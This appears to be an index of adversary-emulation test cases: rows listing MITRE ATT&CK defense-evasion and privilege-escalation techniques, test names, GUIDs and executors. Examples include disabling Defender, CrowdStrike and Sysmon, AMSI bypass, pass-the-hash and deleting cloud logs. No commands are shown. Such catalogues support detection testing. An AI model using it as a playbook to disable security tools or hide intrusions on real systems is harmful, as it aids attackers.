338 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
339 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
340 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
341 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
342 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
343 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 8 Decompile Local CHM File 20cb05e0-1fa5-406d-92c1-84da4ba01813 command_prompt
344 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
345 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
346 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
347 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
348 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
349 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
350 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
351 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
352 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
353 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 5 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
354 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 6 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
355 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
356 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 8 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
357 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 9 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
358 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
359 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
360 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
361 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 13 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
362 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 14 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
363 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 15 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
364 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 16 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
365 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 17 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
366 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 18 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
367 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 19 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
368 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 20 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
369 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 21 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
370 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
371 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
372 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
373 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 25 office-365-Disable-AntiPhishRule b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 powershell
374 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 26 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
375 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 27 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
376 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 28 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
377 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 29 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
378 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 30 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
379 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 31 LockBit Black - Disable Privacy Settings Experience Using Registry -cmd d6d22332-d07d-498f-aea0-6139ecb7850e command_prompt
380 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 32 LockBit Black - Use Registry Editor to turn on automatic logon -cmd 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 command_prompt
381 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 33 LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell d8c57eaa-497a-4a08-961e-bd5efd7c9374 powershell
382 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 34 Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell 5e27f36d-5132-4537-b43b-413b0d5eec9a powershell
383 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 35 Disable Windows Defender with PwSh Disable-WindowsOptionalFeature f542ffd3-37b4-4528-837f-682874faa012 powershell
384 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 36 WMIC Tamper with Windows Defender Evade Scanning Folder 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 command_prompt
385 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 37 Delete Windows Defender Scheduled Tasks 4b841aa1-0d05-4b32-bbe7-7564346e7c76 command_prompt
386 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 38 Clear History 23b88394-091b-4968-a42d-fb8076992443 sh
387 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 39 Suspend History 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4 sh
388 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 40 Reboot Linux Host via Kernel System Request 6d6d3154-1a52-4d1a-9d51-92ab8148b32e sh
389 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 41 Clear Pagging Cache f790927b-ea85-4a16-b7b2-7eb44176a510 sh
390 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 42 Disable Memory Swap e74e4c63-6fde-4ad2-9ee8-21c3a1733114 sh
391 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 43 Disable Hypervisor-Enforced Code Integrity (HVCI) 70bd71e6-eba4-4e00-92f7-617911dbe020 powershell
392 defense-evasion T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
393 defense-evasion T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
394 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
395 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
396 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
397 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
398 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
399 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
400 defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
401 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
402 defense-evasion T1027 Obfuscated Files or Information 9 Snake Malware Encrypted crmlog file 7e47ee60-9dd1-4269-9c4f-97953b183268 powershell
403 defense-evasion T1027 Obfuscated Files or Information 10 Execution from Compressed JScript File fad04df1-5229-4185-b016-fb6010cd87ac command_prompt
404 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
405 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
406 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
407 defense-evasion T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
408 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
409 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
410 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
411 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
412 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
413 defense-evasion T1036.003 Masquerading: Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
414 defense-evasion T1036.003 Masquerading: Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
415 defense-evasion T1036.003 Masquerading: Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
416 defense-evasion T1036.003 Masquerading: Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
417 defense-evasion T1036.003 Masquerading: Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
418 defense-evasion T1036.003 Masquerading: Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
419 defense-evasion T1036.003 Masquerading: Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
420 defense-evasion T1036.003 Masquerading: Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
421 defense-evasion T1036.003 Masquerading: Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
422 defense-evasion T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
423 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
424 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
425 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
426 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
427 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
428 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
429 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
430 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 6 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
431 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
432 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
433 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
434 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
435 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
436 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
437 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
438 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
439 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
440 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
441 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
442 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 1 AWS - CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
443 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
444 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
445 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 4 AWS - Disable CloudTrail Logging Through Event Selectors using Stratus a27418de-bdce-4ebd-b655-38f11142bf0c sh
446 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 5 AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus 22d89a2f-d475-4895-b2d4-68626d49c029 sh
447 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 6 AWS - Remove VPC Flow Logs using Stratus 93c150f5-ad7b-4ee3-8992-df06dec2ac79 sh
448 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 7 AWS - CloudWatch Log Group Deletes 89422c87-b57b-4a04-a8ca-802bb9d06121 sh
449 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
450 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 Office 365 - Set Audit Bypass For a Mailbox c9a2f6fe-7197-488c-af6d-10c782121ca6 powershell
451 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
452 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
453 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
454 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
455 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
456 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
457 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
458 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
459 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 7 Delete an entire folder - Windows PowerShell edd779e4-a509-4cba-8dfa-a112543dbfb1 powershell
460 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 bash
461 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
462 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
463 defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
464 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
465 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
466 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
467 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
468 defense-evasion T1036.006 Masquerading: Space after Filename 1 Space After Filename (Manual) 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
469 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
470 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
471 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
472 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
473 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
474 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
475 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
476 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
477 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
478 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
479 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
480 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
481 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
482 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
483 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
484 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
485 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
486 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 8 Hide Files Through Registry f650456b-bd49-4bc1-ae9d-271b5b9581e7 command_prompt
487 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
488 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
489 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
490 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
491 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
492 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 4 Create ADS PowerShell 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 powershell
493 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
494 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
495 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
496 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
497 defense-evasion T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
498 defense-evasion T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
499 defense-evasion T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
500 defense-evasion T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
501 defense-evasion T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
502 defense-evasion T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
503 defense-evasion T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
504 defense-evasion T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
505 defense-evasion T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
506 defense-evasion T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
507 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 1 Lolbin Jsc.exe compile javascript to exe 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8 command_prompt
508 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 2 Lolbin Jsc.exe compile javascript to dll 3fc9fea2-871d-414d-8ef6-02e85e322b80 command_prompt
509 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
510 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
511 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
512 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
513 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
514 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
515 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
516 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
517 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
518 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
519 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
520 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
521 privilege-escalation T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
